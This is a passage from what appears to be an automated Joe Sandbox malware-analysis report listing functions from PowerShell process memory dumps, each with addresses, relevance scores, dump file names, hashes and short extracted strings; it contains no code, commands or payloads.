                                                                                                • Instruction Fuzzy Hash: 6B2127B5520280EFCF05CF14DAC4B26BFA6FB88314F24C69DEA094A257C336D496CB61
                                                                                                Function 032CF51B Relevance: .1, Instructions: 57COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1985501836.00000000032CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_32cd000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a89199e71a2f2f2a9adf406ea1041e5b746e28aab0e6237c120dfcb4fbddfc9c
                                                                                                • Instruction ID: 052cd35bbb9fdc2686fc86cf2d47497a9174bc37b1628fcf3f8e7db8f906be0e
                                                                                                • Opcode Fuzzy Hash: a89199e71a2f2f2a9adf406ea1041e5b746e28aab0e6237c120dfcb4fbddfc9c
                                                                                                • Instruction Fuzzy Hash: 21219D76514281DFCF06CF14DAC4B16BF72FB48314F28C6ADD9094A666C33AD46ACB91
                                                                                                Function 0504FF24 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ba2720d64e81e972ee35157e33ef65d40d967369015a113d848086e0f805f03f
                                                                                                • Instruction ID: 6f5a9bcfa5eaeb05f3b6000cbb65f7b0f8bb763f6a7d5238449e0fc1a54195c5
                                                                                                • Opcode Fuzzy Hash: ba2720d64e81e972ee35157e33ef65d40d967369015a113d848086e0f805f03f
                                                                                                • Instruction Fuzzy Hash: 9A1149B59002498FCB10DFAAD4456DEFFF5EF88320F248419D419A7240CB35A544CFA5
                                                                                                Function 0504FF28 Relevance: .0, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b6a4eb787017878da0fc4a9d9c368e317f3a696f4bf750a152ad303532affb7d
                                                                                                • Instruction ID: 6e3bfc2500bd4eddce5ef0b2c8105cc7856240c5fe08ab58a95bcf3a6bfd7bbc
                                                                                                • Opcode Fuzzy Hash: b6a4eb787017878da0fc4a9d9c368e317f3a696f4bf750a152ad303532affb7d
                                                                                                • Instruction Fuzzy Hash: ED1146B19002498FCB10DFAAC4456DEFBF5EF88320F208429D419A7240CB35A944CFA4
                                                                                                Function 032CD006 Relevance: .0, Instructions: 47COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1985501836.00000000032CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_32cd000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2fdc1726089933e27c9c7cc5d49f04478c610471b2c1cab8ad0164f7ac37a7cb
                                                                                                • Instruction ID: 6cf25e933f28dc80373e82cc4fdd49510e194ccaa725b4b912a7e5e98736c06c
                                                                                                • Opcode Fuzzy Hash: 2fdc1726089933e27c9c7cc5d49f04478c610471b2c1cab8ad0164f7ac37a7cb
                                                                                                • Instruction Fuzzy Hash: 5401527245D3C05FD7128B258C94752BFA8DF53224F1D85DBE8888F197C2685C85C772
                                                                                                Function 0504F510 Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 34805899732d3901f7e3341650d1ba15e19f5b81bb8dc7ab601a848a7aea8f9f
                                                                                                • Instruction ID: cde86540fe2db1c4dcc0bd45da5d70cab5a1dfa5e832962b30f6a8e05bd26e7a
                                                                                                • Opcode Fuzzy Hash: 34805899732d3901f7e3341650d1ba15e19f5b81bb8dc7ab601a848a7aea8f9f
                                                                                                • Instruction Fuzzy Hash: 6F01D6B93186504F8B466B3CA46887DBBE3FFCA632315045EE847C7752DE688C168B51
                                                                                                Function 032CD01D Relevance: .0, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1985501836.00000000032CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_32cd000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3ae8cc65b078a0941846c382ae6e6f4b0ff8b07876d83664028cdc89fff5102f
                                                                                                • Instruction ID: 6d0a607a65365e01f904bec69f8a1405b42792a805f6783e6b9973ae40bfbee7
                                                                                                • Opcode Fuzzy Hash: 3ae8cc65b078a0941846c382ae6e6f4b0ff8b07876d83664028cdc89fff5102f
                                                                                                • Instruction Fuzzy Hash: 3901A7725293849AE710CA1DCC84B67FFD8DF51325F1CC66DED490B242C6799881C6B1
                                                                                                Function 0504F520 Relevance: .0, Instructions: 37COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 034fd93c0ac2dbf00b27bb1a8c4d8b49d9f9c3b61343d9091c767e13de0c9300
                                                                                                • Instruction ID: b85de1c02735f3c4d2c8439cf203871f36f9fddc54018ba88d1ccbeb7eb10a05
                                                                                                • Opcode Fuzzy Hash: 034fd93c0ac2dbf00b27bb1a8c4d8b49d9f9c3b61343d9091c767e13de0c9300
                                                                                                • Instruction Fuzzy Hash: 24F090793146108B8605BB2CE46883EB7E7FFC9632310441EE906C7751EF799C128791
                                                                                                Function 0504FDD0 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e52edaec5e0015e60b555ebaf9238acfe963d7f649e91a1b71cf5d9027cf267c
                                                                                                • Instruction ID: b502b4a19f0cdf9f1db96b5a85ae2894a9ade6e3ed27cdcba6e2bfb0f9ee8648
                                                                                                • Opcode Fuzzy Hash: e52edaec5e0015e60b555ebaf9238acfe963d7f649e91a1b71cf5d9027cf267c
                                                                                                • Instruction Fuzzy Hash: 35E0ECB4D04209AFC780DFAD99415ADFFF4EB49200B6085AAC918E7701E73196528FD1
                                                                                                Function 0504FDD8 Relevance: .0, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                • Instruction ID: bc0b61d704388c2d18af7cde820bb0f015617a3aec789b5a925d89e87ffa88ab
                                                                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                • Instruction Fuzzy Hash: 25D042B0D04209AF8780EFA9994156EFBF4AB59200B6085AA8919E7301E6329A128BD1

                                                                                                Non-executed Functions

                                                                                                Function 07BCD8DD Relevance: 14.0, Strings: 11, Instructions: 209COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$84ul$84ul$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q
                                                                                                • API String ID: 0-1429631659
                                                                                                • Opcode ID: 7c2c3bd2c8f4c7eee977679f4475ae5a56c3f80e8f702ea214d8619f6c13d2d5
                                                                                                • Instruction ID: 1cffa3405e28ad4c983d4ee88aea0a37c58ec93ba59733f9ea4a33c900d55a37
                                                                                                • Opcode Fuzzy Hash: 7c2c3bd2c8f4c7eee977679f4475ae5a56c3f80e8f702ea214d8619f6c13d2d5
                                                                                                • Instruction Fuzzy Hash: 4C71D4F9B0020A9FEB24DF64845576ABBE2EB88711F14C4EDE9058B390DB31D841CBA1
                                                                                                Function 07BC16D0 Relevance: 12.8, Strings: 10, Instructions: 274COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$]$tP^q$tP^q$$^q$$^q$$^q$ml$ml
                                                                                                • API String ID: 0-2519749623
                                                                                                • Opcode ID: 4991e8ed59e068c19e4ea95fca7c361c004ea2860dd8bc28797ba4e3ff02ad5e
                                                                                                • Instruction ID: eec1bc01b7886faeafb944c818f2447424bbc7b1b1495a3dd1a76df23ec79da8
                                                                                                • Opcode Fuzzy Hash: 4991e8ed59e068c19e4ea95fca7c361c004ea2860dd8bc28797ba4e3ff02ad5e
                                                                                                • Instruction Fuzzy Hash: 399126F270421D8FEB25CA2C840566ABBE2EF82621F14C4EED545DF252DB71DC46C7A2
                                                                                                Function 07BCDDCC Relevance: 10.2, Strings: 8, Instructions: 164COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$84ul$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-3752238523
                                                                                                • Opcode ID: f314d8940fbad24727f312014888c9b94943b0cf1eb35b8233be8df9f6dbf7d7
                                                                                                • Instruction ID: 1ca1c627f45732f27f6e8af4ae6dcf4bfdab0a8adeed98e3cc4e21a208fd13e4
                                                                                                • Opcode Fuzzy Hash: f314d8940fbad24727f312014888c9b94943b0cf1eb35b8233be8df9f6dbf7d7
                                                                                                • Instruction Fuzzy Hash: 8051BCF470020ADBFB29CE05C545BAAB7A6FB45311F58C4FEE8049B2A5C731D985CBA1
                                                                                                Function 07BC0AE8 Relevance: 8.9, Strings: 7, Instructions: 179COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tP^q$tP^q$$^q$$^q$$^q$ml$ml
                                                                                                • API String ID: 0-1096739536
                                                                                                • Opcode ID: 348bae3f5ca61e72819c9131f7134b3acea1a9fab05cb734aaabaeb99f958be2
                                                                                                • Instruction ID: 38f5e2fee41f613ec29efbe176b7e37ce923685d693e1857b38d229c98805ea5
                                                                                                • Opcode Fuzzy Hash: 348bae3f5ca61e72819c9131f7134b3acea1a9fab05cb734aaabaeb99f958be2
                                                                                                • Instruction Fuzzy Hash: 9D5137F2304366CFE714DA699C0062ABBE5EFC6625B28C4AFE445CB251CA32D845C361
                                                                                                Function 07BCFB89 Relevance: 8.8, Strings: 7, Instructions: 82COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tP^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-100824264
                                                                                                • Opcode ID: d4405b03c81cee0a70ff2deb5b86086c27349ffd46ec447a7ce0c841ac3355c2
                                                                                                • Instruction ID: a4943c7b85f4a18020d79fe8d6333f8932506ab4ac31bb4685df9abd2ae610d7
                                                                                                • Opcode Fuzzy Hash: d4405b03c81cee0a70ff2deb5b86086c27349ffd46ec447a7ce0c841ac3355c2
                                                                                                • Instruction Fuzzy Hash: 972127F3B1021A8FEB28CF688854A76B7E2EB44611B2489EEE900CF355CB31CC45C351
                                                                                                Function 07BCE7E8 Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$84ul$tP^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-109380643
                                                                                                • Opcode ID: a7fa16a4af1a9886d21baf4ccea66b951c49c7ebc56cf7ac6aefdd3de9b22e0a
                                                                                                • Instruction ID: 30a3e0cecead856e1404503af19d8673555348cc3a0223d981920991fe7ddc4c
                                                                                                • Opcode Fuzzy Hash: a7fa16a4af1a9886d21baf4ccea66b951c49c7ebc56cf7ac6aefdd3de9b22e0a
                                                                                                • Instruction Fuzzy Hash: 4D616BF0A0020ADFEB28CE14C6887AA77A1FB45751F58C4EDE8055B290DB75E981CBA1
                                                                                                Function 07BCD9DE Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$84ul$d%dq$d%dq$d%dq$tP^q
                                                                                                • API String ID: 0-2431970000
                                                                                                • Opcode ID: 5f38359be2b36dce43a7bc9732c85f3dc79710baec6328411d7ad9fc05a25e7a
                                                                                                • Instruction ID: 427180c6d9afb01e9f4782099ddfe8e425d20a5ea0010894380e1d3a831665f9
                                                                                                • Opcode Fuzzy Hash: 5f38359be2b36dce43a7bc9732c85f3dc79710baec6328411d7ad9fc05a25e7a
                                                                                                • Instruction Fuzzy Hash: CC3181F4B002159FEB24DF54C554A69B7E2EB88710F29C5ADEA059B350C731DD41CB90
                                                                                                Function 07BC0538 Relevance: 6.4, Strings: 5, Instructions: 154COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-3272787073
                                                                                                • Opcode ID: 63be2d7a7637145a530f26bb1ff474079b57e3d013c3803c33d2fae8752e517b
                                                                                                • Instruction ID: e16c4ff3506c2e06f873c9a63864f4ffed67e72bc417b4f29d85211dacf9b21b
                                                                                                • Opcode Fuzzy Hash: 63be2d7a7637145a530f26bb1ff474079b57e3d013c3803c33d2fae8752e517b
                                                                                                • Instruction Fuzzy Hash: 924107F1B1421ADFEB25AE248C116BA7BA1DFC1211F1484BEDA05CF291DF31C985C7A2
                                                                                                Function 07BCEB9F Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 84ul$XRcq$XRcq$tP^q$$^q
                                                                                                • API String ID: 0-3339980478
                                                                                                • Opcode ID: 89cf2a39191d212b43ad7f666b11a6e1336c1ab1b4fa0461afab49f74f1b771a
                                                                                                • Instruction ID: 01bfe18a4fdcae3727a3dbe2c65ab6fe6d602367f1c799e079e5b1833cda8261
                                                                                                • Opcode Fuzzy Hash: 89cf2a39191d212b43ad7f666b11a6e1336c1ab1b4fa0461afab49f74f1b771a
                                                                                                • Instruction Fuzzy Hash: 7D415DB1A00205DBEB24CF19C544AAABBF2EF45710F19C5EEE8159F255C731DD84CBA0
                                                                                                Function 07BCD1A8 Relevance: 5.5, Strings: 4, Instructions: 486COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (o^q$(o^q$(o^q$(o^q
                                                                                                • API String ID: 0-1978863864
                                                                                                • Opcode ID: 7c1a7c25ea5530a38df3560972b0d4cfde095fc767e4dce218fc856bdd00f036
                                                                                                • Instruction ID: fdcd35fdd9ed253411e5b66d266fc7bf19721773d7bd3b9f19810d6fe46762a8
                                                                                                • Opcode Fuzzy Hash: 7c1a7c25ea5530a38df3560972b0d4cfde095fc767e4dce218fc856bdd00f036
                                                                                                • Instruction Fuzzy Hash: EDF101F57042069FEB25CE68C8057AABBA2EB85311F14C4FEE915CF291DB31D845CB61
                                                                                                Function 07BC81B8 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fwl$(fwl$(fwl$(fwl
                                                                                                • API String ID: 0-2555649572
                                                                                                • Opcode ID: f0f51455791a58b84d99bb546794b44544c5a71beb25efd2249e029ba509bd5f
                                                                                                • Instruction ID: c836f96701915164b4ae7298411e45f30498f20657d2761985b461d06f3df841
                                                                                                • Opcode Fuzzy Hash: f0f51455791a58b84d99bb546794b44544c5a71beb25efd2249e029ba509bd5f
                                                                                                • Instruction Fuzzy Hash: F5717EF0A10209DFEB24CF58C555AAABBE2EF89311F14C0A9D915AF355CB31EC41CBA1
                                                                                                Function 07BCF763 Relevance: 5.1, Strings: 4, Instructions: 99COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$W$$^q$$^q
                                                                                                • API String ID: 0-2713088846
                                                                                                • Opcode ID: df0e58a3589088628c2d1b90264bfa3172e3a95de5de89cea61f1bcf60ec6e4e
                                                                                                • Instruction ID: a5b953dc0c50f480be0afbd57ee9d1f41c86193de38b26f0204854df82ea554c
                                                                                                • Opcode Fuzzy Hash: df0e58a3589088628c2d1b90264bfa3172e3a95de5de89cea61f1bcf60ec6e4e
                                                                                                • Instruction Fuzzy Hash: 943169F2A10206DFEB24CE18C6487B97BA3EB02710F54C1EEE854AB195D735D984CBA1
                                                                                                Function 07BC36A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-2125118731
                                                                                                • Opcode ID: fb52562dc3b636ab8a221fb6b678e58d27b1dcb23ad116ec04b9aec1c31018bd
                                                                                                • Instruction ID: d8edaf096995ccbbb9308101cce1b230609dab2563c52b1daa10731c433ad6cf
                                                                                                • Opcode Fuzzy Hash: fb52562dc3b636ab8a221fb6b678e58d27b1dcb23ad116ec04b9aec1c31018bd
                                                                                                • Instruction Fuzzy Hash: F22149F13142166BEB3899799802F37BAD69BC2711FA4C47FA509CB381DD35C8458762
                                                                                                Function 07BC3683 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: W$$^q$$^q$$^q
                                                                                                • API String ID: 0-354484689
                                                                                                • Opcode ID: 802fd7fe20aecb2c03b065138eb87a0cd2ff2dc594d1c0424aa391025e8da870
                                                                                                • Instruction ID: 6c7eb94c3f3a515834a738fe466d8a9bfc7e79c358a6096c9dab676f60434f05
                                                                                                • Opcode Fuzzy Hash: 802fd7fe20aecb2c03b065138eb87a0cd2ff2dc594d1c0424aa391025e8da870
                                                                                                • Instruction Fuzzy Hash: 3021C5F13083865BEB258A354811B627FE58B93610F99C4DFDA84DB2D3D93989488762
                                                                                                Function 07BCA337 Relevance: 5.1, Strings: 4, Instructions: 76COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-2125118731
                                                                                                • Opcode ID: f57124ef364cf78e1e65c680bf6af4da0844d627daa0629018b0208ff91a0791
                                                                                                • Instruction ID: 00c633eae5396a980cfd0917de5bb0ab0603b0a49575e6a123899e6e24862e4a
                                                                                                • Opcode Fuzzy Hash: f57124ef364cf78e1e65c680bf6af4da0844d627daa0629018b0208ff91a0791
                                                                                                • Instruction Fuzzy Hash: 3421CFF191430EDBEB21CEA5D449666BBF0EB85210F18C0FEC8048F201DB35D485CBA2
                                                                                                Function 07BC030B Relevance: 5.0, Strings: 4, Instructions: 43COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                • API String ID: 0-2049395529
                                                                                                • Opcode ID: 435ff0ab281f18089a42e381b4ee7768d96e7b6e3670f24cfb846293cacc3aaf
                                                                                                • Instruction ID: 004954c514a37bde3f0be31b43bd8dc7af598bbe97a24808c24bd19981fe0df0
                                                                                                • Opcode Fuzzy Hash: 435ff0ab281f18089a42e381b4ee7768d96e7b6e3670f24cfb846293cacc3aaf
                                                                                                • Instruction Fuzzy Hash: 8001F9A1B1D3968FD72B662818242642FF25FC6611B1985EFC541CF397CD144C49C3A7